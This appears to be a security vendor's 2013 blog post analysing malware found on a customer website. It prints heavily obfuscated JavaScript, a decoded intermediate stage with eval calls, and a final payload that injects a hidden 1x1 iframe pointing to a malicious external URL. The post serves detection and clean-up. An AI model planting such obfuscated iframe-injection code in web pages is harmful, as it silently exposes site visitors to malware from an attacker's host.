Friday, May 3, 2013

More than 150 variables and multiple obfuscation levels to generate malicious iframe


154 variables and multiple obfuscation levels used to generate hidden malicious iframe

Background


On 5 May 2013, during scheduled monitoring of a customer website, potentially suspicious content was detected on the home page.
We decided to dedicate a post to it because what initially looked like a low-severity (Potentially Suspicious) threat turned out to be carefully crafted malicious code: more than 150 variables are used to generate a hidden malicious iframe, aided by arithmetic operations, eval, unescape and other JavaScript methods that obfuscate and deliver the attack.

Malicious action

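Malicious iframes are often used to distribute malware hosted on external web resources (websites): the visitor's browser loads the external content inside the infected page without any visible sign.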


Initial threat

The detection reported by the Website Malware Monitoring & alerting service looked like this:
[[ unescape(ZQCtZ.replace(/qz/g,'3').replace(/vFQ%/g,'%')) ]]


When one of Quttera's researchers manually investigated this page, its content turned out to be quite interesting: more than 150 variables are used to generate a hidden malicious iframe pointing to http://triplex.lazyfish[.]cc/forum/Lasna, using arithmetic operations and the eval, replace and unescape methods.
Here are the two JavaScript portions that comprised the threat (both are truncated here, and in this rendering some `var` keywords appear fused to the variable name that follows them):


  1. <script>
  2. var SNZWz="2vFQ%q";var I7GA3X="vFQ%qz";var ijD85AH5="FQ%6FvFQ";var XDHG="5AvFQ%6Dv";var zNefmg2="2eM702";varDtTu8="2E2eM632eM632e";var UWPDJ3="AvFQ%6DvFQ%54vF";var qhyU="2eM4C2eM";var S1nZ1dzJ=".replace";varqe9PifE1="9%q6E%q43%q73";var ef4g9OD="672eM652eM742eM";var hapxCQo="M6F2eM712";var ocLLHE="place(/%e/g,'%";varQCxMwm="31wK27wK3B";var Wq7P="27vFQ%2BvF";var oiGKWh="M6E2eM432eM732";var VauKkg="%qzB';eval(une";varGePy="j1H69j1H6Cj";var U7wTw7tD="kAx.repl";var d4W6c38="1%q39%q6A%q";var eBaeIu="eM302e";vark959QQ="Q%qzCvFQ%2FvFQ";var nDpQe="FQ%65vFQ%6Ev";ijD85AH5+="%6qzvFQ%7";var ZsDQnL3="69vFQ%66";varMNJt="2E2eM7";var aDPn4E="4wK74wK68wK3ISj";var B7zjLI4="H68j1H69j1H64j1";var TlUlo3="2eM6E2eM742";varPBLDV="vFQ%76vFQ%61vFQ";var Hk6qlEBB="64vFQ%69vFQ%76v";oiGKWh+="eM3O2eM";varGiKE="FQ%/g,'%')))";DtTu8+="M2F2eM662eM6F";var hKVXb=").replace(";QCxMwm+="';eval(unesca";varZxbFWakR="Q%qzDvFQ%qzDv";var O8b9R="6EvFQ%74vFQ%2Ev";var V4MXa="8%q69%q6C%";var Oj7WlN="652eM6E2e";varM8yYr="Q%qzDvFQ%27vFQ%";var lUclTS0O="H43j1H73j1H39j";var TmvWay="43j1H7";d4W6c38+="38%q30%q2E%q61";varYBYr2="eM272eM2O2eM3";aDPn4E="d9GwK77wK69wK6"+aDPn4E;var U6op="2eM6C2eM652eM6n";XDHG="%qz5vFQ%"+XDHG;varqUoHq="%72vFQ%69v";var FpPlJ5Qj="M272eM3B';eva";hKVXb=S1nZ1dzJ+"(/O/g,'9'"+hKVXb;varIsbBw="70vFQ%4";O8b9R+="FQ%62vFQ";var bTRzxxnl="eM7A2e";PBLDV+="%72vFQ%20vFQ%";var XGl0y="722eM6O2";vartfMjw="2eM432eM732e";var yueNLQ="FQ%28vFQ%4Bv";O8b9R+="%6FvFQ%";qe9PifE1+="%q39%q42%q78%q";varytapwxL="5vFQ%27v";var eGJC4hE="/ISj/g,'D')";var oJm0i="')));var 
kXPK=";varfOjK="12eM6n42eM652";d4W6c38=oJm0i+"'%q50%q6F%q7"+d4W6c38;ytapwxL+="FQ%qzEvFQ%qzCv";ytapwxL=SNZWz+"z7vFQ%6"+ytapwxL;varpbVeoE="6E2eM742eM2E2eM";varZ1HTQz3N="QCtZ.replace(";YBYr2="72eM652"+YBYr2;qUoHq="2EvFQ%77vFQ"+qUoHq;aDPn4E+="wK27wK31wK2";varNbzTZ="7O2eM4O2e";lUclTS0O="H49j1H39j1H6Ej1"+lUclTS0O;TmvWay="1H39j1H6Ej1H"+TmvWay;varmhK4V5="Q%79vFQ";qUoHq+="FQ%74vF";B7zjLI4="j1H3Dj1H27j1"+B7zjLI4;varOAcbJ5="1H27j1H";fOjK+="eM272eM2O2eM3";TlUlo3+="eM282e";var WG0onsku="wK39wK6%d9";var uz4F="M632eM752eM6n42";varCuaMbHhb="6CvFQ%6CvF";var ...
  3. eval(ocLLHE);
  4. </script>
  5. <script>
  6. var cRpFMoZ="586I276I3E6";var wWsP="6I3C6I";var cLvBPy="kn/g,'D').repla";var Ck7rxL8="96I766I3E6";varscNVqCC3="%9T2I9T7";var SvHjm=";var D";var sWkMjo0="%9T7X%9T79%9";var gUYF="/9Cn/g,'B";var gtElz="place(/cV4/";varrgO9M="6I626I6F6I6";var Rh9T87h9="656I6E6I746I2";var olhu82j="B%9T52%9T50%9T";var kEmDB9="9T50%9T42%";varTNoG6="796I3kn6I3k";var UdyK="16I3kn6I226I3";var TPS5C="n6I656I";Rh9T87h9+="E6I776I";var S4KzmDL="T74%9T28%9";varDC1E="7Ys46Ys6F";var F0xaI="6I456I486I636I3";var s8JMD="9T6I9T61%9T27%9";var QoQAX5="%9T65%9";varBSqb4o="ETT='%9T76%9T61";var TgLXmGg="6F6I636I";var y6cwX8="%9T69%9T67%";var JT4rcB="D%9T64%9T6F";varRAyjF="s65Ys6EYs64Ys4";y6cwX8="9T68%9T65"+y6cwX8;var qTeaS="Ys50YscV49Y";cLvBPy=gUYF+"').replace(/"+cLvBPy;varOv7AU="%').rep";var FXXNZi="756I6C6I6";var kQEmjUwg="65%9T6I9T7";var x2GCd=";eval(unescape";varo4Qrl9r1="cV48Ys5cV4Ys";var wknkCaq6="E6I746I2E6I6";var  ...
  7. eval(gtElz);
  8. </script>


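During the execution of the script another code portion was generated (line 7 of the listing calls alert where the other lines call eval, presumably a substitution made during analysis so that the decoded string is displayed rather than executed):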

  1. <script>
  2. varZQCtZ='vFQ%76vFQ%61vFQ%72vFQ%20vFQ%4BvFQ%qz5vFQ%5AvFQ%6DvFQ%54vFQ%qzDvFQ%22vFQ%qzCvFQ%64vFQ%69vFQ%76vFQ%20vFQ%69vFQ%64vFQ%qzDvFQ%27vFQ%72vFQ%qz8vFQ%70vFQ%46vFQ%5qzvFQ%62vFQ%qz7vFQ%65vFQ%27vFQ%qzEvFQ%qzCvFQ%2FvFQ%64vFQ%69vFQ%76vFQ%qzEvFQ%22vFQ%qzBvFQ%69vFQ%66vFQ%28vFQ%64vFQ%6FvFQ%6qzvFQ%75vFQ%6DvFQ%65vFQ%6EvFQ%74vFQ%2EvFQ%62vFQ%6FvFQ%64vFQ%79vFQ%qzDvFQ%qzDvFQ%6EvFQ%75vFQ%6CvFQ%6CvFQ%29vFQ%4BvFQ%qz5vFQ%5AvFQ%6DvFQ%54vFQ%qzDvFQ%27vFQ%qzCvFQ%62vFQ%6FvFQ%64vFQ%79vFQ%qzEvFQ%27vFQ%2BvFQ%4BvFQ%qz5vFQ%5AvFQ%6DvFQ%54vFQ%2BvFQ%27vFQ%qzCvFQ%2FvFQ%62vFQ%6FvFQ%64vFQ%79vFQ%qzEvFQ%27vFQ%qzBvFQ%64vFQ%6FvFQ%6qzvFQ%75vFQ%6DvFQ%65vFQ%6EvFQ%74vFQ%2EvFQ%77vFQ%72vFQ%69vFQ%74vFQ%65vFQ%20vFQ%28vFQ%4BvFQ%qz5vFQ%5AvFQ%6DvFQ%54vFQ%29vFQ%qzB';
  3. eval(unescape(ZQCtZ.replace(/qz/g,'3').replace(/vFQ%/g,'%')));
  4. varlnwIHV19='2eM762eM612eM722eM202eM502eM6F2eM712eM3O2eM6A2eM382eM302eM3n42eM642eM6F2eM632eM752eM6n42eM652eM6E2eM742eM2E2eM672eM652eM742eM452eM6C2eM652eM6n42eM652eM6E2eM742eM422eM7O2eM4O2eM642eM282eM272eM722eM382eM702eM462eM532eM622eM372eM652eM272eM2O2eM3B2eM762eM612eM722eM202eM4O2eM3O2eM6E2eM432eM732eM3O2eM422eM782eM3n42eM642eM6F2eM632eM752eM6n42eM652eM6E2eM742eM2E2eM632eM722eM652eM612eM742eM652eM452eM6C2eM652eM6n42eM652eM6E2eM742eM282eM272eM6O2eM662eM722eM612eM6n42eM652eM272eM2O2eM3B2eM4O2eM3O2eM6E2eM432eM732eM3O2eM422eM782eM2E2eM732eM722eM632eM3n42eM272eM682eM742eM742eM702eM3A2eM2F2eM2F2eM742eM722eM6O2eM702eM6C2eM652eM782eM2E2eM6C2eM612eM7A2eM7O2eM662eM6O2eM732eM682eM2E2eM632eM632eM2F2eM662eM6F2eM722eM752eM6n42eM2F2eM4C2eM612eM732eM6E2eM612eM272eM3B';eval(unescape(lnwIHV19.replace(/O/g,'9').replace(/n4/g,'D').replace(/2eM/g,'%')));
  5. varwbbeBrNK='wK49wK39wK6%d9GwK43wK73wK39wK42wK78wK2%d9GwK77wK69wK64wK74wK68wK3ISjwK27wK31wK27wK3BwK49wK39wK6%d9GwK43wK73wK39wK42wK78wK2%d9GwK68wK65wK69wK67wK68wK74wK3ISjwK27wK31wK27wK3B';eval(unescape(wbbeBrNK.replace(/%d9G/g,'E').replace(/ISj/g,'D').replace(/wK/g,'%')));varnkAx='j1H49j1H39j1H6Ej1H43j1H73j1H39j1H42j1H78j1H2Ej1H6Ej1H61j1H6Dj1H65j1H3Dj1H27j1H66j1H33j1H53j1H57j1H33j1H74j1H48j1H77j1H47j1H59j1H27j1H3Bj1H49j1H39j1H6Ej1H43j1H73j1H39j1H42j1H78j1H2Ej1H73j1H74j1H79j1H6Cj1H65j1H2Ej1H76j1H69j1H73j1H69j1H62j1H69j1H6Cj1H69j1H74j1H79j1H3Dj1H27j1H68j1H69j1H64j1H64j1H65j1H6Ej1H27j1H3B';eval(unescape(nkAx.replace(/j1H/g,'%')));varkXPK='%q50%q6F%q71%q39%q6A%q38%q30%q2E%q61%q70%q70%q65%q6E%q64%q43%q68%q69%q6C%q64%q28%q49%q39%q6E%q43%q73%q39%q42%q78%q29%q3B';eval(unescape(kXPK.replace(/%q/g,'%e').replace(/%e/g,'%')));
  6. vargWRzgv0='6I766I616I726I206I656I796I356I756I316I3kn6I226I3C6I646I696I766I206I696I646I3kn6I276I456I486I636I336I686I4C6I656I586I276I3E6I3C6I2F6I646I696I766I3E6I226I39Cn6I696I666I286I646I6F6I636I756I6kn6I656I6E6I746I2E6I626I6F6I646I796I3kn6I3kn6I6E6I756I6C6I6C6I296I656I796I356I756I316I3kn6I276I3C6I626I6F6I646I796I3E6I276I29Cn6I656I796I356I756I316I29Cn6I276I3C6I2F6I626I6F6I646I796I3E6I276I39Cn6I646I6F6I636I756I6kn6I656I6E6I746I2E6I776I726I696I746I656I206I286I656I796I356I756I316I296I39Cn6I766I616I726I206I586I446I466I546I6A6I556I6E6I3kn6I646I6F6I636I756I6kn6I656I6E6I746I2E6I676I656I746I456I6C6I656I6kn6I656I6E6I746I426I796I496I646I286I276I456I486I636I336I686I4C6I656I586I276I296I39Cn';
  7. alert(unescape(gWRzgv0.replace(/9Cn/g,'B').replace(/kn/g,'D').replace(/6I/g,'%')));
  8. varmETT='%9T76%9T61%9T72%9T20%9T52%9T50%9T42%9T6X%9T50%9T50%9T3D%9T64%9T6F%9T63%9T75%9T6D%9T65%9T6I9T74%9T2I9T63%9T72%9T65%9T61%9T74%9T65%9T45%9T6C%9T65%9T6D%9T65%9T6I9T74%9T28%9T27%9T69%9T66%9T72%9T61%9T6D%9T65%9T27%9T29%9T3B%9T52%9T50%9T42%9T6X%9T50%9T50%9T2I9T73%9T72%9T63%9T3D%9T27%9T68%9T74%9T74%9T70%9T3X%9T2F%9T2F%9T74%9T72%9T69%9T70%9T6C%9T65%9T78%9T2I9T6C%9T61%9T7X%9T79%9T66%9T69%9T73%9T68%9T2I9T63%9T63%9T2F%9T66%9T6F%9T72%9T75%9T6D%9T2F%9T4C%9T61%9T73%9T6I9T61%9T27%9T3B%9T52%9T50%9T42%9T6X%9T50%9T50%9T2I9T77%9T69%9T64%9T74%9T68%9T3D%9T27%9T31%9T27%9T3B%9T52%9T50%9T42%9T6X%9T50%9T50%9T2I9T68%9T65%9T69%9T67%9T68%9T74%9T3D%9T27%9T31%9T27%9T3B';
  9. </script>


Malicious payload


Finally, all of these strings decode to JavaScript code that injects a hidden iframe pointing to http://triplex.lazyfish[.]cc/forum/Lasna

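The final code creating the iframe is shown below. The other strings in the generated portion decode to statements that write a placeholder <div>, set the iframe's style.visibility to 'hidden' and append the iframe to that <div>, which is why a visitor sees nothing on the page: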


  1. var RPBjPP=document.createElement('iframe');
  2. RPBjPP.src='http://triplex.lazyfish.cc/forum/Lasna';
  3. RPBjPP.width='1';
  4. RPBjPP.height='1';



Malware clean-up


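Such malware is often hidden inside JavaScript files. If you suspect that your website has been infected by similar malware, please use Website Anti-malware Monitoring for remediation assessment. Removing the injected script alone does not explain how it got onto the site, so the way it was placed there should be investigated as well.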